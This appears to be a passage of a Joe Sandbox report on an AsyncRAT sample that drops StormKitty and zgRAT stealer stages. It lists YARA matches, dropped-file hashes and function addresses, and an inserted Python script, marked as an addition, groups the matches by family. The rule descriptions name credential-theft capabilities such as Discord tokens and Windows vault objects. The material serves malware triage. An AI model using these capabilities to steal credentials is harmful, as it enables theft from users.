                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 00000008.00000002.1805730959.0000000005577000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000002.2919350933.0000000003312000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000002.2929848498.0000000005B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000001C.00000002.2919353202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 00000000.00000002.1725153654.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000002.2930700554.0000000005BAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000000.00000002.1725732577.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000000.00000002.1725732577.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000007.00000002.2930537569.0000000005B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000002.2919350933.000000000339B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000002.2917460428.0000000001452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000008.00000002.1804100868.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: Process Memory Space: svchost.exe PID: 3620, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: Detects StormKitty infostealer Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: Detects StormKitty infostealer Author: ditekSHen
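The rows above mix family rules (AsyncRAT, StormKitty, zgRAT) with capability indicators (reversed ASEP keys, Discord token regexes, VPN client strings, vault GUIDs) across six source types. The Python below is an added example, not part of the Joe Sandbox report: it folds the rows into a per-family view of where each family was seen (on the submitted file, on dropped files, in unpacked PE regions, in memory, in the PCAP) and which processes carried it, and then lists the families that never match the submitted sample itself. The embedded rows are a subset copied from the section above with the column separator restored; the family-name regexes are the only classification knowledge it assumes.

```python
"""Aggregate YARA 'Matched rule' rows by malware family and by where the match
occurred, to separate what is in the submitted file from what only appears
after a process unpacks or drops it."""
import re
from collections import defaultdict

# Subset of the 'System Summary' rows copied from the report above (column
# separator restored). The row regex also accepts the fused form.
REPORT_ROWS = r"""
Source: zrrHgsDzgS.exe, type: SAMPLE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: zrrHgsDzgS.exe, type: SAMPLE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: dump.pcap, type: PCAP | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE | Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000007.00000002.2919350933.0000000003312000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED | Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED | Matched rule: Detects StormKitty infostealer Author: ditekSHen
""".strip().splitlines()

# One report row: source column, source type, rule text, rule author.
ROW_RE = re.compile(r"^Source: (.*?), type: ([A-Z]+)\s*\|?\s*Matched rule: (.*?) Author: (\S+)\s*$")

# Assumption: a rule whose name or description contains the family name is a family rule.
FAMILY_PATTERNS = {
    "AsyncRAT": re.compile(r"asyncrat", re.I),
    "StormKitty": re.compile(r"stormkitty", re.I),
    "zgRAT": re.compile(r"zgrat", re.I),
}

# '<pid-index>.<pass>.<process>.<base>.<n>.unpack' and 'Process Memory Space: <process> PID: <n>'
UNPACK_RE = re.compile(r"^\d+\.\d+\.(.+?\.exe)\.")
PMS_RE = re.compile(r"^Process Memory Space: (\S+) PID: (\d+)$")


def family_of(rule_text):
    """Family name for a family rule, None for INDICATOR_* capability rules."""
    for fam, pat in FAMILY_PATTERNS.items():
        if pat.search(rule_text):
            return fam
    return None


def process_of(source):
    """Process name behind an unpacked-PE or process-memory source, else None."""
    m = UNPACK_RE.match(source) or PMS_RE.match(source)
    return m.group(1) if m else None


def aggregate(rows):
    """family -> {'types': [...], 'dropped': [file names], 'processes': [...]}"""
    fam = defaultdict(lambda: {"types": set(), "dropped": set(), "processes": set()})
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue
        source, kind, rule, _author = m.groups()
        f = family_of(rule)
        if f is None:
            continue
        fam[f]["types"].add(kind)
        if kind == "DROPPED":
            fam[f]["dropped"].add(source.rsplit("\\", 1)[-1])
        p = process_of(source)
        if p:
            fam[f]["processes"].add(p)
    return {f: {k: sorted(v) for k, v in d.items()} for f, d in fam.items()}


def staged_payloads(summary):
    """Families that never match the submitted file: they arrive as a later
    stage that is only visible once a process unpacks or drops it."""
    return sorted(f for f, d in summary.items() if "SAMPLE" not in d["types"])


if __name__ == "__main__":
    s = aggregate(REPORT_ROWS)
    for f, d in s.items():
        print(f, d)
    print("staged:", staged_payloads(s))
```

Run against the rows here, the summary shows the split a responder needs: AsyncRAT is present in the submitted file, in the PCAP and in the persistence copy svchost.exe, whereas StormKitty and zgRAT are absent from the submitted file and only surface in the unpacked memory of svchost.exe (process 7) and in the dropped udwnme.exe and luglzv.exe. Disk-only scanning of the original sample would therefore miss the stealer stage entirely.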
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017FC3E07_2_017FC3E0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017F63D87_2_017F63D8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017FC7407_2_017FC740
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017F6CA87_2_017F6CA8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017F60907_2_017F6090
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017FC3CF7_2_017FC3CF
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017FC73F7_2_017FC73F
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017F4A547_2_017F4A54
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017FAE887_2_017FAE88
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075CB6F87_2_075CB6F8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075CBE987_2_075CBE98
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075CBE887_2_075CBE88
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075D74787_2_075D7478
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075D5C007_2_075D5C00
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075DA3307_2_075DA330
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075D9BD07_2_075D9BD0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075D4BF87_2_075D4BF8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075D2AA87_2_075D2AA8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075D16D07_2_075D16D0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075DB0507_2_075DB050
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075D40E07_2_075D40E0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076174A07_2_076174A0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076171407_2_07617140
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_0761A1577_2_0761A157
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076157437_2_07615743
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_0761E14F7_2_0761E14F
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_0761E1807_2_0761E180
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_07614EC07_2_07614EC0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_07614ED07_2_07614ED0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076109717_2_07610971
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076109507_2_07610950
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076109A07_2_076109A0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076109907_2_07610990
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076C9FE17_2_076C9FE1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076C9FF07_2_076C9FF0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076C9FF07_2_076C9FF0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_081888107_2_08188810
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0147639015_2_01476390
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_01475AC015_2_01475AC0
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0147975015_2_01479750
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0147976015_2_01479760
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0147577815_2_01475778
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_054005FE15_2_054005FE
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0540060015_2_05400600
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0540C10815_2_0540C108
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0540C0F715_2_0540C0F7
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_05405D5315_2_05405D53
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_05405D6015_2_05405D60
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_00DC639028_2_00DC6390
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_00DC5AC028_2_00DC5AC0
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_00DC975028_2_00DC9750
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_00DC577828_2_00DC5778
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_00DC976028_2_00DC9760
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_050A05FF28_2_050A05FF
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_050A060028_2_050A0600
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_050AC10828_2_050AC108
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_050AC0F728_2_050AC0F7
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_050A5D5328_2_050A5D53
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_050A5D6028_2_050A5D60
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\udwnme.exe 817940C9DD88C9D185F58532E2027E9DF7BFACA8249EC96AE055DA03C8750F20
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\svchost.exe 9C457B1CD061AE951FBED7841149B247E085BEFA6E2C5170058CE35CDEBCE548
                    Source: zrrHgsDzgS.exe, 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStub.exe" vs zrrHgsDzgS.exe
                    Source: zrrHgsDzgS.exe, 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe" vs zrrHgsDzgS.exe
                    Source: zrrHgsDzgS.exeBinary or memory string: OriginalFilenameStub.exe" vs zrrHgsDzgS.exe
                    Source: zrrHgsDzgS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: zrrHgsDzgS.exe, type: SAMPLEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: zrrHgsDzgS.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infostealers
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infostealers
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
